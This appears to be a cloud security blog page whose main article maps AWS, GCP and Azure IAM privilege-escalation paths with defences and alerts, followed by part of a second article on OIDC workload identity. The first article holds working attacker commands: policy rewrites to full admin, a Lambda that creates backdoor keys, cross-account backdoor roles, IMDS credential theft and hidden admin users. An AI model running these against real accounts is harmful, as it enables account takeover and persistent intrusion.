Linuxcent

AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

May 10, 2026April 18, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes → OIDC Workload Identity → AWS IAM Privilege Escalation

TL;DR

Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.

Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise — and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a web application firewall, reached the EC2 instance metadata service, retrieved temporary credentials for the instance’s IAM role, and found a role with sts:AssumeRole permissions that let it assume a more powerful role. That more powerful role had access to S3 buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.

The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.

Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters

# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("[email protected]"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"

# Azure: establish context
az account show
az role assignment list --assignee [email protected] --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.

AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now grants AdministratorAccess to everyone with it attached

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
aws lambda invoke --function-name exfil-fn /tmp/output.json

import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    return {"buckets": [b['Name'] for b in buckets['Buckets']], "key": key}

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.

Path 5: SSRF to EC2 Instance Metadata

The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}

High-Risk AWS Permissions Reference

Permission	Why It’s Dangerous
`iam:PassRole` with `Resource: *`	Assign any role to any service — enables immediate privilege escalation
`iam:CreatePolicyVersion`	Rewrite any policy to grant anything — full account takeover in one API call
`iam:AttachRolePolicy`	Attach AdministratorAccess to any role
`iam:UpdateAssumeRolePolicy`	Add any principal to any role’s trust policy
`iam:CreateAccessKey` on other users	Create persistent credentials for any IAM user
`lambda:UpdateFunctionCode` on privileged Lambda	Inject malicious code into an elevated function
`secretsmanager:GetSecretValue` with `Resource: *`	Read every secret in the account
`ssm:GetParameter` with `Resource: *`	Read all Parameter Store values — often contains credentials
`iam:CreateRole` + `iam:AttachRolePolicy`	Create and arm a backdoor role

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

GCP’s equivalent of iam:PassRole — and broader. Allows an identity to make any GCP service act as a specified service account:

# Attacker has iam.serviceAccounts.actAs on an admin SA
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  [email protected]
# Valid until explicitly deleted — no expiry by default

# Block this at org level
gcloud org-policies set-policy --organization=ORG_ID - << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee [email protected] \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM
curl 'http://169.254.169.254/metadata/identity/oauth2/token\
?api-version=2018-02-01&resource=https://management.azure.com/' \
  -H 'Metadata: true'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor — hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
    "Action": "sts:AssumeRole"
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level — survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:[email protected]" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.

Detection — What to Alert On

Activity	Event to Watch	Priority
Role trust policy modified	`UpdateAssumeRolePolicy`	Critical
New IAM user created	`CreateUser`	High
Policy version created	`CreatePolicyVersion`	High
Policy attached to role	`AttachRolePolicy`, `PutRolePolicy`	High
SA key created (GCP)	`google.iam.admin.v1.CreateServiceAccountKey`	High
Role assignment at subscription scope (Azure)	`roleAssignments/write` at `/subscriptions/`	Critical
CloudTrail logging disabled	`StopLogging`, `DeleteTrail`	Critical
`GetSecretValue` at unusual hours	`secretsmanager:GetSecretValue`	Medium

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — CloudTrail doesn't log data plane events by default ║
║                                                                      ║
║  S3 object reads (GetObject), Secrets Manager reads (GetSecretValue)║
║  and SSM GetParameter are data events — not logged by CloudTrail   ║
║  unless you explicitly enable Data Events. An attacker exfiltrating ║
║  data via these calls leaves no trace in a default CloudTrail       ║
║  configuration.                                                      ║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail. At minimum    ║
║  enable logging for secretsmanager:GetSecretValue.                  ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — find all roles with iam:PassRole on Resource: *                              │
│  aws iam list-policies --scope Local --query 'Policies[*].Arn' --output text | \     │
│    xargs -I{} aws iam get-policy-version \                                            │
│      --policy-arn {} --version-id v1 --query 'PolicyVersion.Document'                │
│                                                                                        │
│  # AWS — check who can assume a given role                                            │
│  aws iam get-role --role-name AdminRole \                                             │
│    --query 'Role.AssumeRolePolicyDocument'                                            │
│                                                                                        │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                           │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                        │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL \                               │
│    --format=json | jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'  │
│                                                                                        │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                        │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 6 — Security Assessment and Testing	IAM attack paths are the foundation of cloud penetration testing and access review methodology
CISSP	Domain 5 — Identity and Access Management	Defensive IAM design requires understanding offensive technique — you cannot protect paths you don’t know exist
ISO 27001:2022	8.8 Management of technical vulnerabilities	IAM misconfigurations are technical vulnerabilities — identifying and remediating privilege escalation paths
ISO 27001:2022	8.16 Monitoring activities	Detection signals and alerting on IAM mutations as part of continuous monitoring
SOC 2	CC7.1	Threat and vulnerability identification — this episode maps the threat model for cloud IAM
SOC 2	CC6.1	Understanding attack paths informs the design of logical access controls that actually hold

Key Takeaways

Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
Enable CloudTrail Data Events — default logging misses S3 reads, Secrets Manager reads, and SSM GetParameter calls entirely
Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

OIDC Workload Identity: Eliminate Cloud Access Keys Entirely

May 10, 2026April 17, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes → OIDC Workload Identity

TL;DR

Workload identity federation replaces static cloud access keys with short-lived tokens tied to runtime identity — no key to rotate, no secret to leak
The OIDC token exchange pattern is consistent across AWS (IRSA / Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, translate the others
AWS EKS: use Pod Identity for new clusters; IRSA is the pattern for existing ones — both eliminate static keys
GCP GKE: --workload-pool at cluster level + roles/iam.workloadIdentityUser binding on the GCP service account
Azure AKS: federated credential on a managed identity + azure.workload.identity/use: "true" pod label
Cross-cloud federation works: an AWS IAM role can call GCP APIs without a GCP key file on the AWS side
Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; give each workload its own identity

The Big Picture

  WORKLOAD IDENTITY FEDERATION — BEFORE AND AFTER

  ── STATIC CREDENTIALS (the broken model) ────────────────────────────────

  IAM user created → access key generated
         ↓
  Key distributed to pods / CI / servers → stored in Secrets, env vars, .env
         ↓
  Valid indefinitely — never expires on its own
         ↓
  Rotation is manual, painful, deferred ("there's a ticket for that")
         ↓
  Key proliferates across environments — you lose track of every copy
         ↓
  Leaked key → unlimited blast radius until someone notices and revokes it

  ── WORKLOAD IDENTITY FEDERATION (the current model) ─────────────────────

  No key created. No key distributed. No key to rotate.

  Workload starts → requests signed JWT from its native IdP
         │           (EKS OIDC issuer, GitHub Actions, GKE metadata server)
         ↓
  JWT carries workload claims: namespace, service account, repo, instance ID
         ↓
  Cloud STS / token endpoint validates JWT signature + trust conditions
         ↓
  Short-lived credential issued  (AWS STS: 1–12h  |  GCP/Azure: ~1h)
         ↓
  Credential expires automatically — nothing to clean up
         ↓
  Token stolen → usable for 1 hour maximum, audience-bound, not reusable

Workload identity federation is the architectural answer to static credential sprawl. The workload’s proof of identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. The cloud provider never issues a persistent secret. This episode covers how that exchange works across all three clouds and Kubernetes.

Introduction

Workload identity federation eliminates static cloud credentials by replacing them with short-lived tokens that the runtime environment generates and the cloud provider validates against a registered trust relationship. No key to distribute, no rotation schedule to maintain, no proliferation to track.

A while back I was reviewing a Kubernetes cluster that had been running in production for about two years. The team had done good work — solid app code, reasonable cluster configuration. But when I started looking at how pods were authenticating to AWS, I found what I find in roughly 60% of environments I look at.

Twelve service accounts. Twelve access key pairs. Keys created 6 to 24 months ago. Stored as Kubernetes Secrets. Mounted into pods as environment variables. Never rotated because “the app would need to be restarted” and nobody owned the rotation schedule. Two of the keys belonged to AWS IAM users who no longer worked at the company — the users had been deactivated, but the access keys were still valid because in AWS, access keys live independently of console login status.

When I asked who was responsible for rotating these, the answer I got was: “There’s a ticket for that.”

There’s always a ticket for that.

The engineering problem here isn’t that the team was careless. It’s that static credentials are fundamentally unmanageable at scale. Workload identity removes the problem at its root.

Why Static Credentials Are the Wrong Model for Machines

Before getting into solutions, let me be precise about why this is a security problem, not just an operational inconvenience.

Static credentials have four fundamental failure modes:

They don’t expire. An AWS access key created in 2022 is valid in 2026 unless someone explicitly rotates it. GitGuardian’s 2024 data puts the average time from secret creation to detection at 328 days. That’s almost a year of exposure window before anyone even knows.

They lose origin context. When an API call arrives at AWS with an access key, the authorization system can tell you what key was used — not whether it was used by your Lambda function, by a developer debugging something, or by an attacker using a stolen copy. Static credentials are context-blind.

They proliferate invisibly. One key, distributed to a team, copied into three environments, cached on developer laptops, stored in a CI/CD pipeline, pasted into a config file in a test environment that got committed. By the time you need to rotate it, you don’t know all the places it lives.

Rotation is operationally painful. Creating a new key, updating every place the old key lives, removing the old key — while ensuring nothing breaks during the transition — is a coordination exercise that organizations consistently defer. Every month the rotation doesn’t happen is another month of accumulated risk.

Workload identity solves all four by replacing persistent credentials with short-lived tokens that are generated from the runtime environment and verified by the cloud provider against a registered trust relationship.

The OIDC Exchange — What’s Actually Happening

All three major cloud providers have converged on the same underlying mechanism: OIDC token exchange.

Workload (pod, GitHub Actions runner, EC2 instance, on-prem server)
    │
    │  1. Request a signed JWT from the native identity provider
    │     (EKS OIDC server, GitHub's token.actions.githubusercontent.com,
    │      GKE metadata server, Azure IMDS)
    ▼
Native IdP issues a JWT. It contains claims about the workload:
    - What repository triggered this CI run
    - What Kubernetes namespace and service account this pod uses
    - What EC2 instance ID this request came from
    │
    │  2. Workload presents the JWT to the cloud STS / federation endpoint
    ▼
Cloud IAM evaluates:
    - Is the JWT signature valid? (verified against the IdP's public keys)
    - Does the issuer match a registered trust relationship?
    - Do the claims match the conditions in the trust policy?
    │
    │  3. If all checks pass: short-lived cloud credentials issued
    │     (AWS: temporary STS credentials, expiry 1-12 hours)
    │     (GCP: OAuth2 access token, expiry ~1 hour)
    │     (Azure: access token, expiry ~1 hour)
    ▼
Workload calls cloud API with short-lived credentials.
Credentials expire. Nothing to clean up. Nothing to rotate.

No static secret is stored anywhere. The workload’s identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. If someone steals the short-lived token, it expires in an hour. If someone tries to use a token for a different resource than it was issued for, the audience claim doesn’t match and it’s rejected.

AWS: IRSA and Pod Identity for EKS

IRSA — The Original Pattern

IRSA (IAM Roles for Service Accounts) federates a Kubernetes service account identity with an AWS IAM role. Each pod’s service account is the proof of identity; AWS issues temporary credentials in exchange for the OIDC JWT.

# Step 1: get the OIDC issuer URL for your EKS cluster
OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-cluster \
  --query "cluster.identity.oidc.issuer" \
  --output text)

# Step 2: register this OIDC issuer with IAM
aws iam create-open-id-connect-provider \
  --url "${OIDC_ISSUER}" \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "$(openssl s_client -connect ${OIDC_ISSUER#https://}:443 2>/dev/null \
    | openssl x509 -fingerprint -noout | cut -d= -f2 | tr -d ':')"

# Step 3: create an IAM role with a trust policy scoped to a specific service account
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
OIDC_ID="${OIDC_ISSUER#https://}"

cat > irsa-trust.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_ID}"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "${OIDC_ID}:sub": "system:serviceaccount:production:app-backend",
        "${OIDC_ID}:aud": "sts.amazonaws.com"
      }
    }
  }]
}
EOF

aws iam create-role \
  --role-name app-backend-s3-role \
  --assume-role-policy-document file://irsa-trust.json

aws iam put-role-policy \
  --role-name app-backend-s3-role \
  --policy-name AppBackendPolicy \
  --policy-document file://app-backend-policy.json

# Step 4: annotate the Kubernetes service account with the role ARN
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/app-backend-s3-role

The EKS Pod Identity webhook injects two environment variables into any pod using this service account: AWS_WEB_IDENTITY_TOKEN_FILE pointing to a projected token, and AWS_ROLE_ARN. The AWS SDK reads these automatically. The application doesn’t know any of this is happening — it just calls S3 and it works, using credentials that were never stored anywhere and expire automatically.

The trust policy’s sub condition is the security boundary. system:serviceaccount:production:app-backend means: only pods in the production namespace using the app-backend service account can assume this role. A pod in a different namespace, even with the same service account name, gets a different sub claim and the assumption fails.

EKS Pod Identity — The Simpler Modern Approach

AWS released Pod Identity as a simpler alternative to IRSA. No OIDC provider setup, no manual trust policy with OIDC conditions:

# Enable the Pod Identity agent addon on the cluster
aws eks create-addon \
  --cluster-name my-cluster \
  --addon-name eks-pod-identity-agent

# Create the association — this replaces the OIDC trust policy setup
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace production \
  --service-account app-backend \
  --role-arn arn:aws:iam::123456789012:role/app-backend-s3-role

Same result, less ceremony. For new clusters, Pod Identity is the path I’d recommend. IRSA remains important to understand for the many existing clusters already using it.

IAM Roles Anywhere — For On-Premises Workloads

Not everything runs in Kubernetes. For on-premises servers and workloads outside AWS, IAM Roles Anywhere issues temporary credentials to servers that present an X.509 certificate signed by a trusted CA:

# Register your internal CA as a trust anchor
aws rolesanywhere create-trust-anchor \
  --name "OnPremCA" \
  --source sourceType=CERTIFICATE_BUNDLE,sourceData.x509CertificateData="$(base64 -w0 ca-cert.pem)"

# Create a profile mapping the CA to allowed roles
aws rolesanywhere create-profile \
  --name "OnPremServers" \
  --role-arns "arn:aws:iam::123456789012:role/OnPremAppRole" \
  --trust-anchor-arns "${TRUST_ANCHOR_ARN}"

# On the on-prem server — exchange the certificate for AWS credentials
aws_signing_helper credential-process \
  --certificate /etc/pki/server.crt \
  --private-key /etc/pki/server.key \
  --trust-anchor-arn "${TRUST_ANCHOR_ARN}" \
  --profile-arn "${PROFILE_ARN}" \
  --role-arn "arn:aws:iam::123456789012:role/OnPremAppRole"

The server’s certificate (managed by your internal PKI or an ACM Private CA) is the proof of identity. No access key distributed to the server — just a certificate that your CA signed and that you can revoke through your existing certificate revocation infrastructure.

GCP: Workload Identity for GKE

For GKE clusters, Workload Identity is enabled at the cluster level and creates a bridge between Kubernetes service accounts and GCP service accounts:

# Enable Workload Identity on the cluster
gcloud container clusters update my-cluster \
  --workload-pool=my-project.svc.id.goog

# Enable on the node pool (required for the metadata server to work)
gcloud container node-pools update default-pool \
  --cluster=my-cluster \
  --workload-metadata=GKE_METADATA

# Create the GCP service account for the workload
gcloud iam service-accounts create app-backend \
  --project=my-project

SA_EMAIL="[email protected]"

# Grant the GCP SA the permissions it needs
gcloud storage buckets add-iam-policy-binding gs://app-data \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Create the trust relationship: K8s SA → GCP SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:my-project.svc.id.goog[production/app-backend]"

# Annotate the Kubernetes service account
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: [email protected]

When the pod makes a GCP API call using ADC (Application Default Credentials), the GKE metadata server intercepts the credential request. It validates the pod’s Kubernetes identity, checks the IAM binding, and returns a short-lived GCP access token. The GCP service account key file never exists. There’s nothing to protect, nothing to rotate, nothing to leak.

Azure: Workload Identity for AKS

Azure’s workload identity for Kubernetes replaced the older AAD Pod Identity approach — which required a DaemonSet, had known TOCTOU vulnerabilities, and was operationally fragile. The current implementation uses the OIDC pattern:

# Enable OIDC issuer and workload identity on the AKS cluster
az aks update \
  --name my-aks \
  --resource-group rg-prod \
  --enable-oidc-issuer \
  --enable-workload-identity

# Get the OIDC issuer URL for this cluster
OIDC_ISSUER=$(az aks show \
  --name my-aks --resource-group rg-prod \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# Create a user-assigned managed identity for the workload
az identity create --name app-backend-identity --resource-group rg-identities
CLIENT_ID=$(az identity show --name app-backend-identity -g rg-identities --query clientId -o tsv)
